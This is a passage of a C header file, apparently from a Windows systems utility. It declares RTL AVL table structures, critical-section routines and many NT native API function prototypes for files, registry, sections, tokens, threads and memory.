NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)(\n\t_In_  _RTL_AVL_TABLE *Table,\n\t_In_ PVOID UserData,\n\t_In_ PVOID MatchData\n\t);\n\ntypedef struct _RTL_BALANCED_LINKS {\n\tstruct _RTL_BALANCED_LINKS *Parent;\n\tstruct _RTL_BALANCED_LINKS *LeftChild;\n\tstruct _RTL_BALANCED_LINKS *RightChild;\n\tCHAR Balance;\n\tUCHAR Reserved[3];\n} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS;\n\ntypedef struct _RTL_AVL_TABLE {\n\tRTL_BALANCED_LINKS BalancedRoot;\n\tPVOID OrderedPointer;\n\tULONG WhichOrderedElement;\n\tULONG NumberGenericTableElements;\n\tULONG DepthOfTree;\n\tPRTL_BALANCED_LINKS RestartKey;\n\tULONG DeleteCount;\n\tPRTL_AVL_COMPARE_ROUTINE CompareRoutine;\n\tPRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;\n\tPRTL_AVL_FREE_ROUTINE FreeRoutine;\n\tPVOID TableContext;\n} RTL_AVL_TABLE, *PRTL_AVL_TABLE;\n\nVOID NTAPI RtlInitializeGenericTableAvl(\n\t_Out_ PRTL_AVL_TABLE Table,\n\t_In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,\n\t_In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,\n\t_In_ PRTL_AVL_FREE_ROUTINE FreeRoutine,\n\t_In_opt_ PVOID TableContext\n\t);\n\nPVOID NTAPI RtlInsertElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_reads_bytes_(BufferSize) PVOID Buffer,\n\t_In_ CLONG BufferSize,\n\t_Out_opt_ PBOOLEAN 
NewElement\n\t);\n\nPVOID NTAPI RtlInsertElementGenericTableFullAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_reads_bytes_(BufferSize) PVOID Buffer,\n\t_In_ CLONG BufferSize,\n\t_Out_opt_ PBOOLEAN NewElement,\n\t_In_ PVOID NodeOrParent,\n\t_In_ TABLE_SEARCH_RESULT SearchResult\n\t);\n\nBOOLEAN NTAPI RtlDeleteElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ PVOID Buffer\n\t);\n\nPVOID NTAPI RtlLookupElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ PVOID Buffer\n\t);\n\nPVOID NTAPI RtlLookupElementGenericTableFullAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ PVOID Buffer,\n\t_Out_ PVOID *NodeOrParent,\n\t_Out_ TABLE_SEARCH_RESULT *SearchResult\n\t);\n\nPVOID NTAPI RtlEnumerateGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ BOOLEAN Restart\n\t);\n\nPVOID NTAPI RtlEnumerateGenericTableWithoutSplayingAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_Inout_ PVOID *RestartKey\n\t);\n\nPVOID NTAPI RtlLookupFirstMatchingElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ PVOID Buffer,\n\t_Out_ PVOID *RestartKey\n\t);\n\nPVOID NTAPI RtlEnumerateGenericTableLikeADirectory(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction,\n\t_In_opt_ PVOID MatchData,\n\t_In_ ULONG NextFlag,\n\t_Inout_ PVOID *RestartKey,\n\t_Inout_ PULONG DeleteCount,\n\t_In_ PVOID Buffer\n\t);\n\nPVOID NTAPI RtlGetElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ ULONG I\n\t);\n\nULONG NTAPI RtlNumberGenericTableElementsAvl(\n\t_In_ PRTL_AVL_TABLE Table\n\t);\n\nBOOLEAN NTAPI RtlIsGenericTableEmptyAvl(\n\t_In_ PRTL_AVL_TABLE Table\n\t);\n\n/*\n** Generic Avl END\n*/\n\n/*\n** Critical Section START\n*/\n#define LOGICAL ULONG\n\nNTSTATUS NTAPI RtlEnterCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nNTSTATUS NTAPI RtlLeaveCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nLOGICAL NTAPI RtlIsCriticalSectionLocked(\n\tIN PRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nLOGICAL NTAPI 
RtlIsCriticalSectionLockedByThread(\n\tIN PRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nULONG NTAPI RtlGetCriticalSectionRecursionCount(\n\tIN PRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nLOGICAL NTAPI RtlTryEnterCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nNTSTATUS NTAPI RtlInitializeCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nVOID NTAPI RtlEnableEarlyCriticalSectionEventCreation(\n\tVOID\n\t);\n\nNTSTATUS NTAPI RtlInitializeCriticalSectionAndSpinCount(\n\tPRTL_CRITICAL_SECTION CriticalSection,\n\tULONG SpinCount\n\t);\n\nULONG NTAPI RtlSetCriticalSectionSpinCount(\n\tPRTL_CRITICAL_SECTION CriticalSection,\n\tULONG SpinCount\n\t);\n\nNTSTATUS NTAPI RtlDeleteCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\n/*\n** Critical Section END\n*/\n\n\n/*\n** Loader API START\n*/\n\nNTSTATUS NTAPI LdrGetProcedureAddress(\n\t_In_ PVOID DllHandle,\n\t_In_opt_ CONST ANSI_STRING* ProcedureName,\n\t_In_opt_ ULONG ProcedureNumber,\n\t_Out_ PVOID *ProcedureAddress\n\t);\n\n/*\n** Loader API END\n*/\n\n/*\n** Native API START\n*/\n\nNTSTATUS NTAPI NtClose(\n\t_In_ HANDLE Handle\n\t);\n\nNTSTATUS NTAPI NtOpenDirectoryObject(\n\t_Out_  PHANDLE\t\t\t\tDirectoryHandle,\n\t_In_   ACCESS_MASK\t\t\tDesiredAccess,\n\t_In_   POBJECT_ATTRIBUTES\tObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryDirectoryObject(\n\t_In_       HANDLE DirectoryHandle,\n\t_Out_opt_  PVOID Buffer,\n\t_In_       ULONG Length,\n\t_In_       BOOLEAN ReturnSingleEntry,\n\t_In_       BOOLEAN RestartScan,\n\t_Inout_    PULONG Context,\n\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtQueryObject(\n\t_In_opt_   HANDLE Handle,\n\t_In_       OBJECT_INFORMATION_CLASS ObjectInformationClass,\n\t_Out_opt_  PVOID ObjectInformation,\n\t_In_       ULONG ObjectInformationLength,\n\t_Out_opt_  PULONG ReturnLength\n\t);\n\nNTSTATUS WINAPI NtQuerySystemInformation(\n\t_In_       SYSTEM_INFORMATION_CLASS SystemInformationClass,\n\t_Inout_    PVOID 
SystemInformation,\n\t_In_       ULONG SystemInformationLength,\n\t_Out_opt_  PULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtCreateMutant(\n\t_Out_\t\tPHANDLE MutantHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_\t\tBOOLEAN InitialOwner\n\t);\n\nNTSTATUS NTAPI NtOpenMutant(\n\t_Out_\tPHANDLE MutantHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryMutant(\n\t_In_\t\tHANDLE MutantHandle,\n\t_In_\t\tMUTANT_INFORMATION_CLASS MutantInformationClass,\n\t_Out_\t\tPVOID MutantInformation,\n\t_In_\t\tULONG MutantInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtReleaseMutant(\n\t_In_\t\tHANDLE MutantHandle,\n\t_Out_opt_\tPLONG PreviousCount\n\t);\n\nNTSTATUS NTAPI NtCreateTimer(\n\t_In_\t\tPHANDLE TimerHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_\t\tTIMER_TYPE TimerType\n\t);\n\nNTSTATUS NtSetTimer(\n\t_In_\t\tHANDLE TimerHandle,\n\t_In_\t\tPLARGE_INTEGER DueTime,\n\t_In_opt_\tPTIMER_APC_ROUTINE TimerApcRoutine,\n\t_In_opt_\tPVOID TimerContext,\n\t_In_\t\tBOOLEAN WakeTimer,\n\t_In_opt_\tLONG Period,\n\t_Out_opt_\tPBOOLEAN PreviousState\n\t);\n\nNTSTATUS NTAPI NtOpenTimer(\n\t_In_\tPHANDLE TimerHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryTimer(\n\t_In_       HANDLE TimerHandle,\n\t_In_       TIMER_INFORMATION_CLASS TimerInformationClass,\n\t_Out_      PVOID TimerInformation,\n\t_In_       ULONG TimerInformationLength,\n\t_Out_opt_  PULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtCreateSymbolicLinkObject(\n\t_Out_   PHANDLE LinkHandle,\n\t_In_    ACCESS_MASK DesiredAccess,\n\t_In_    POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_    PUNICODE_STRING LinkTarget\n\t);\n\nNTSTATUS WINAPI NtOpenSymbolicLinkObject(\n\t_Out_\tPHANDLE LinkHandle,\n\t_In_\tACCESS_MASK 
DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQuerySymbolicLinkObject(\n\t_In_\t\tHANDLE LinkHandle,\n\t_Inout_\t\tPUNICODE_STRING LinkTarget,\n\t_Out_opt_\tPULONG  ReturnedLength\n\t);\n\nNTSTATUS NTAPI NtQuerySemaphore(\n\t_In_\t\tHANDLE SemaphoreHandle,\n\t_In_\t\tSEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,\n\t_Out_\t\tPVOID SemaphoreInformation,\n\t_In_\t\tULONG SemaphoreInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtQueryDirectoryFile(\n\t_In_\t\tHANDLE FileHandle,\n\t_In_opt_\tHANDLE Event,\n\t_In_opt_\tPIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_\tPVOID ApcContext,\n\t_Out_\t\tPIO_STATUS_BLOCK IoStatusBlock,\n\t_Out_\t\tPVOID FileInformation,\n\t_In_\t\tULONG Length,\n\t_In_\t\tFILE_INFORMATION_CLASS FileInformationClass,\n\t_In_\t\tBOOLEAN ReturnSingleEntry,\n\t_In_opt_\tPUNICODE_STRING FileName,\n\t_In_\t\tBOOLEAN RestartScan\n\t);\n\nNTSTATUS NTAPI NtQuerySection(\n\t_In_\t\tHANDLE SectionHandle,\n\t_In_\t\tSECTION_INFORMATION_CLASS SectionInformationClass,\n\t_Out_\t\tPVOID SectionInformation,\n\t_In_\t\tSIZE_T SectionInformationLength,\n\t_Out_opt_\tPSIZE_T ReturnLength\n\t);\n\nNTSTATUS NtOpenSection(\n\t_Out_\tPHANDLE SectionHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtCreateSection(\n\t_Out_\t\tPHANDLE SectionHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_\tPLARGE_INTEGER MaximumSize,\n\t_In_\t\tULONG SectionPageProtection,\n\t_In_\t\tULONG AllocationAttributes,\n\t_In_opt_\tHANDLE FileHandle\n\t);\n\nNTSTATUS NTAPI NtMapViewOfSection(\n\t_In_\t\tHANDLE SectionHandle,\n\t_In_\t\tHANDLE ProcessHandle,\n\t__inout\t\tPVOID *BaseAddress,\n\t_In_\t\tULONG_PTR ZeroBits,\n\t_In_\t\tSIZE_T CommitSize,\n\t_Inout_opt_ PLARGE_INTEGER SectionOffset,\n\t_Inout_\t\tPSIZE_T ViewSize,\n\t_In_\t\tSECTION_INHERIT InheritDisposition,\n\t_In_\t\tULONG 
AllocationType,\n\t_In_\t\tULONG Win32Protect\n\t);\n\nNTSTATUS NTAPI NtUnmapViewOfSection(\n\t_In_\tHANDLE ProcessHandle,\n\t_In_\tPVOID BaseAddress\n\t);\n\nNTSTATUS NTAPI NtOpenProcessToken(\n\t_In_\tHANDLE ProcessHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_Out_\tPHANDLE TokenHandle\n\t);\n\n\nNTSTATUS NTAPI NtOpenThreadTokenEx(\n\t_In_       HANDLE ThreadHandle,\n\t_In_       ACCESS_MASK DesiredAccess,\n\t_In_       BOOLEAN OpenAsSelf,\n\t_In_       ULONG HandleAttributes,\n\t_Out_      PHANDLE TokenHandle\n\t);\n\nNTSTATUS NTAPI NtAdjustPrivilegesToken(\n\t_In_\t\tHANDLE TokenHandle,\n\t_In_\t\tBOOLEAN DisableAllPrivileges,\n\t_In_opt_\tPTOKEN_PRIVILEGES NewState,\n\t_In_opt_\tULONG BufferLength,\n\t_Out_opt_\tPTOKEN_PRIVILEGES PreviousState,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtQueryInformationToken(\n\t_In_\tHANDLE TokenHandle,\n\t_In_\tTOKEN_INFORMATION_CLASS TokenInformationClass,\n\t_Out_\tPVOID TokenInformation,\n\t_In_\tULONG TokenInformationLength,\n\t_Out_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtOpenKey(\n\t_Out_\tPHANDLE KeyHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryKey(\n\t_In_\t\tHANDLE KeyHandle,\n\t_In_\t\tKEY_INFORMATION_CLASS KeyInformationClass,\n\t_Out_opt_\tPVOID KeyInformation,\n\t_In_\t\tULONG Length,\n\t_Out_\t\tPULONG ResultLength\n\t);\n\nNTSTATUS NTAPI NtQueryValueKey(\n\t_In_       HANDLE KeyHandle,\n\t_In_       PUNICODE_STRING ValueName,\n\t_In_       KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\n\t_Out_      PVOID KeyValueInformation,\n\t_In_       ULONG Length,\n\t_Out_      PULONG ResultLength\n\t);\n\nNTSTATUS NTAPI NtDeleteKey(\n\t_In_       HANDLE KeyHandle\n\t);\n\nNTSTATUS NTAPI NtDeleteValueKey(\n\t_In_       HANDLE KeyHandle,\n\t_In_       PUNICODE_STRING ValueName\n\t);\n\nNTSTATUS NTAPI NtOpenJobObject(\n\t_Out_\tPHANDLE JobHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES 
ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryInformationJobObject(\n\t_In_opt_\tHANDLE JobHandle,\n\t_In_\t\tJOBOBJECTINFOCLASS JobObjectInformationClass,\n\t_Out_\t\tPVOID JobObjectInformation,\n\t_In_\t\tULONG JobObjectInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtOpenIoCompletion(\n\t_Out_\tPHANDLE IoCompletionHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryIoCompletion(\n\t_In_\t\tHANDLE IoCompletionHandle,\n\t_In_\t\tIO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,\n\t_Out_\t\tPVOID IoCompletionInformation,\n\t_In_\t\tULONG IoCompletionInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtQueryInformationFile(\n\t_In_\tHANDLE FileHandle,\n\t_Out_\tPIO_STATUS_BLOCK IoStatusBlock,\n\t_Out_\tPVOID FileInformation,\n\t_In_\tULONG Length,\n\t_In_\tFILE_INFORMATION_CLASS FileInformationClass\n\t);\n\nNTSTATUS NTAPI NtFsControlFile(\n\t_In_     HANDLE FileHandle,\n\t_In_opt_ HANDLE Event,\n\t_In_opt_ PIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_ PVOID ApcContext,\n\t_Out_    PIO_STATUS_BLOCK IoStatusBlock,\n\t_In_     ULONG FsControlCode,\n\t_In_     PVOID InputBuffer,\n\t_In_     ULONG InputBufferLength,\n\t_Out_    PVOID OutputBuffer,\n\t_In_     ULONG OutputBufferLength\n\t);\n\nNTSTATUS NTAPI NtQueryDirectoryFile(\n\t_In_      HANDLE FileHandle,\n\t_In_opt_  HANDLE Event,\n\t_In_opt_  PIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_  PVOID ApcContext,\n\t_Out_     PIO_STATUS_BLOCK IoStatusBlock,\n\t_Out_     PVOID FileInformation,\n\t_In_      ULONG Length,\n\t_In_      FILE_INFORMATION_CLASS FileInformationClass,\n\t_In_      BOOLEAN ReturnSingleEntry,\n\t_In_opt_  PUNICODE_STRING FileName,\n\t_In_      BOOLEAN RestartScan\n\t);\n\nNTSTATUS NTAPI NtQueryEaFile(\n\t_In_ HANDLE FileHandle,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t__out_bcount(Length) PVOID Buffer,\n\t_In_ ULONG Length,\n\t_In_ BOOLEAN 
ReturnSingleEntry,\n\t__in_bcount_opt(EaListLength) PVOID EaList,\n\t_In_ ULONG EaListLength,\n\t_In_opt_ PULONG EaIndex,\n\t_In_ BOOLEAN RestartScan\n\t);\n\nNTSTATUS NTAPI NtSetEaFile(\n\t_In_ HANDLE FileHandle,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t__in_bcount(Length) PVOID Buffer,\n\t_In_ ULONG Length\n\t);\n\nNTSTATUS NTAPI NtQueryVolumeInformationFile(\n\t_In_    HANDLE FileHandle,\n\t_Out_   PIO_STATUS_BLOCK IoStatusBlock,\n\t_Out_   PVOID FsInformation,\n\t_In_    ULONG Length,\n\t_In_    FS_INFORMATION_CLASS FsInformationClass\n\t);\n\nNTSTATUS NTAPI NtOpenFile(\n\t_Out_\tPHANDLE FileHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_Out_\tPIO_STATUS_BLOCK IoStatusBlock,\n\t_In_\tULONG ShareAccess,\n\t_In_\tULONG OpenOptions\n\t);\n\nNTSTATUS NTAPI NtReadFile(\n\t_In_     HANDLE FileHandle,\n\t_In_opt_ HANDLE Event,\n\t_In_opt_ PIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_ PVOID ApcContext,\n\t_Out_    PIO_STATUS_BLOCK IoStatusBlock,\n\t__out_bcount(Length) PVOID Buffer,\n\t_In_     ULONG Length,\n\t_In_opt_ PLARGE_INTEGER ByteOffset,\n\t_In_opt_ PULONG Key\n\t);\n\nNTSTATUS NTAPI NtWriteFile(\n\t_In_ HANDLE FileHandle,\n\t_In_opt_ HANDLE Event,\n\t_In_opt_ PIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_ PVOID ApcContext,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t_In_ PVOID Buffer,\n\t_In_ ULONG Length,\n\t_In_opt_ PLARGE_INTEGER ByteOffset,\n\t_In_opt_ PULONG Key\n\t);\n\nNTSTATUS NTAPI NtFlushBuffersFile(\n\t_In_ HANDLE FileHandle,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock\n\t);\n\nNTSTATUS NTAPI NtSetInformationFile(\n\t_In_ HANDLE FileHandle,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t__in_bcount(Length) PVOID FileInformation,\n\t_In_ ULONG Length,\n\t_In_ FILE_INFORMATION_CLASS FileInformationClass\n\t);\n\nNTSTATUS NTAPI NtDeleteFile(\n\t_In_ POBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtOpenEvent(\n\t_Out_\tPHANDLE EventHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES 
ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtOpenKeyedEvent(\n\t_Out_\tPHANDLE KeyedEventHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtOpenSemaphore(\n\t_Out_\tPHANDLE SemaphoreHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryEvent(\n\t_In_\t\tHANDLE EventHandle,\n\t_In_\t\tEVENT_INFORMATION_CLASS EventInformationClass,\n\t_Out_\t\tPVOID EventInformation,\n\t_In_\t\tULONG EventInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtOpenEventPair(\n\t_Out_\tPHANDLE EventPairHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\n//TmTx\nNTSTATUS NTAPI NtCreateTransaction(\n\t_Out_     PHANDLE TransactionHandle,\n\t_In_      ACCESS_MASK DesiredAccess,\n\t_In_opt_  POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_  LPGUID Uow,\n\t_In_opt_  HANDLE TmHandle,\n\t_In_opt_  ULONG CreateOptions,\n\t_In_opt_  ULONG IsolationLevel,\n\t_In_opt_  ULONG IsolationFlags,\n\t_In_opt_  PLARGE_INTEGER Timeout,\n\t_In_opt_  PUNICODE_STRING Description\n\t);\n\n//TmRm\nNTSTATUS NTAPI NtCreateResourceManager(\n\t_Out_     PHANDLE ResourceManagerHandle,\n\t_In_      ACCESS_MASK DesiredAccess,\n\t_In_      HANDLE TmHandle,\n\t_In_opt_  LPGUID ResourceManagerGuid,\n\t_In_opt_  POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_  ULONG CreateOptions,\n\t_In_opt_  PUNICODE_STRING Description\n\t);\n\n//TmEn\nNTSTATUS NTAPI NtCreateEnlistment(\n\t_Out_     PHANDLE EnlistmentHandle,\n\t_In_      ACCESS_MASK DesiredAccess,\n\t_In_      HANDLE ResourceManagerHandle,\n\t_In_      HANDLE TransactionHandle,\n\t_In_opt_  POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_  ULONG CreateOptions,\n\t_In_      NOTIFICATION_MASK NotificationMask,\n\t_In_opt_  PVOID EnlistmentKey\n\t);\n\n//TmTm\nNTSTATUS NTAPI NtCreateTransactionManager(\n\t_Out_     PHANDLE TmHandle,\n\t_In_      ACCESS_MASK 
DesiredAccess,\n\t_In_opt_  POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_  PUNICODE_STRING LogFileName,\n\t_In_opt_  ULONG CreateOptions,\n\t_In_opt_  ULONG CommitStrength\n\t);\n\nNTSTATUS NTAPI NtCreateFile(\n\t_Out_\t\tPHANDLE FileHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_\t\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_Out_\t\tPIO_STATUS_BLOCK IoStatusBlock,\n\t_In_opt_\tPLARGE_INTEGER AllocationSize,\n\t_In_\t\tULONG FileAttributes,\n\t_In_\t\tULONG ShareAccess,\n\t_In_\t\tULONG CreateDisposition,\n\t_In_\t\tULONG CreateOptions,\n\t_In_opt_\tPVOID EaBuffer,\n\t_In_\t\tULONG EaLength\n\t);\n\nNTSTATUS NTAPI NtOpenProcess(\n\t_Out_\t\tPHANDLE ProcessHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_\t\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_\tPCLIENT_ID ClientId\n\t);\n\nNTSTATUS NTAPI NtTerminateProcess(\n\t_In_opt_\tHANDLE ProcessHandle,\n\t_In_\t\tNTSTATUS ExitStatus\n\t);\n\nNTSTATUS NTAPI NtSuspendThread(\n\t_In_\t\tHANDLE ThreadHandle,\n\t_Out_opt_\tPULONG PreviousSuspendCount\n\t);\n\nNTSTATUS NTAPI NtResumeThread(\n\t_In_\t\tHANDLE ThreadHandle,\n\t_Out_opt_\tPULONG PreviousSuspendCount\n\t);\n\nNTSTATUS NTAPI NtOpenThread(\n\t_Out_       PHANDLE ThreadHandle,\n\t_In_        ACCESS_MASK DesiredAccess,\n\t_In_        POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_    PCLIENT_ID ClientId\n\t);\n\nNTSTATUS NTAPI NtImpersonateThread(\n\t_In_        HANDLE ServerThreadHandle,\n\t_In_        HANDLE ClientThreadHandle,\n\t_In_        PSECURITY_QUALITY_OF_SERVICE SecurityQos\n\t);\n\nNTSTATUS NTAPI NtSetContextThread(\n\t_In_        HANDLE ThreadHandle,\n\t_In_        PCONTEXT ThreadContext\n\t);\n\nNTSTATUS NTAPI NtGetContextThread(\n\t_In_        HANDLE ThreadHandle,\n\t_Inout_     PCONTEXT ThreadContext\n\t);\n\nNTSTATUS NTAPI NtQueryInformationProcess(\n\t_In_\t\tHANDLE ProcessHandle,\n\t_In_\t\tPROCESSINFOCLASS ProcessInformationClass,\n\t_Out_\t\tPVOID ProcessInformation,\n\t_In_\t\tULONG 
ProcessInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtDuplicateObject(\n\t_In_\t\tHANDLE SourceProcessHandle,\n\t_In_\t\tHANDLE SourceHandle,\n\t_In_opt_\tHANDLE TargetProcessHandle,\n\t_Out_\t\tPHANDLE TargetHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_\t\tULONG HandleAttributes,\n\t_In_\t\tULONG Options\n\t);\n\nNTSTATUS NTAPI NtSetSecurityObject(\n\t_In_\tHANDLE Handle,\n\t_In_\tSECURITY_INFORMATION SecurityInformation,\n\t_In_\tPSECURITY_DESCRIPTOR SecurityDescriptor\n\t);\n\nNTSTATUS NTAPI NtQuerySecurityObject(\n\t_In_\tHANDLE Handle,\n\t_In_\tSECURITY_INFORMATION SecurityInformation,\n\t_Out_\tPSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_In_\tULONG Length,\n\t_Out_\tPULONG LengthNeeded\n\t);\n\nNTSTATUS NtCreateIoCompletion(\n\t_Out_\t\tPHANDLE IoCompletionHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_\tULONG Count\n\t);\n\nNTSTATUS NTAPI NtCreateEvent(\n\t_Out_\t\tPHANDLE EventHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_\t\tEVENT_TYPE EventType,\n\t_In_\t\tBOOLEAN InitialState\n\t);\n\nNTSTATUS NTAPI NtAllocateVirtualMemory(\n\t_In_        HANDLE ProcessHandle,\n\t_Inout_     PVOID *BaseAddress,\n\t_In_        ULONG_PTR ZeroBits,\n\t_Inout_     PSIZE_T RegionSize,\n\t_In_        ULONG AllocationType,\n\t_In_        ULONG Protect\n\t);\n\nNTSTATUS NTAPI NtFreeVirtualMemory(\n\t_In_       HANDLE ProcessHandle,\n\t_Inout_    PVOID *BaseAddress,\n\t_Inout_    PSIZE_T RegionSize,\n\t_In_       ULONG FreeType\n\t);\n\nNTSTATUS NTAPI NtQueryVirtualMemory(\n\t_In_\t\tHANDLE ProcessHandle,\n\t_In_\t\tPVOID BaseAddress,\n\t_In_\t\tMEMORY_INFORMATION_CLASS MemoryInformationClass,\n\t_Out_\t\tPVOID MemoryInformation,\n\t_In_\t\tSIZE_T MemoryInformationLength,\n\t_Out_opt_\tPSIZE_T ReturnLength\n\t);\n\nNTSTATUS NTAPI NtReadVirtualMemory(\n\t_In_\t\tHANDLE ProcessHandle,\n\t_In_opt_\tPVOID 
BaseAddress,\n\t_Out_\t\tPVOID Buffer,\n\t_In_\t\tSIZE_T BufferSize,\n\t_Out_opt_\tPSIZE_T NumberOfBytesRead\n\t);\n\nNTSTATUS NTAPI NtWriteVirtualMemory(\n\t_In_        HANDLE ProcessHandle,\n\t_In_opt_    PVOID BaseAddress,\n\t_In_        VOID *Buffer,\n\t_In_        SIZE_T BufferSize,\n\t_Out_opt_   PSIZE_T NumberOfBytesWritten\n\t);\n\nNTSTATUS NTAPI NtProtectVirtualMemory(\n\t_In_        HANDLE ProcessHandle,\n\t_Inout_     PVOID *BaseAddress,\n\t_Inout_     PSIZE_T RegionSize,\n\t_In_        ULONG NewProtect,\n\t_Out_       PULONG OldProtect\n\t);\n\nNTSTATUS NTAPI NtEnumerateKey(\n\t_In_\t\tHANDLE KeyHandle,\n\t_In_\t\tULONG Index,\n\t_In_\t\tKEY_INFORMATION_CLASS KeyInformationClass,\n\t_Out_opt_\tPVOID KeyInformation,\n\t_In_\t\tULONG Length,\n\t_Out_\t\tPULONG ResultLength\n\t);\n\nNTSTATUS NTAPI NtCreatePort(\n\t_Out_\tPHANDLE PortHandle,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_\tULONG MaxConnectionInfoLength,\n\t_In_\tULONG 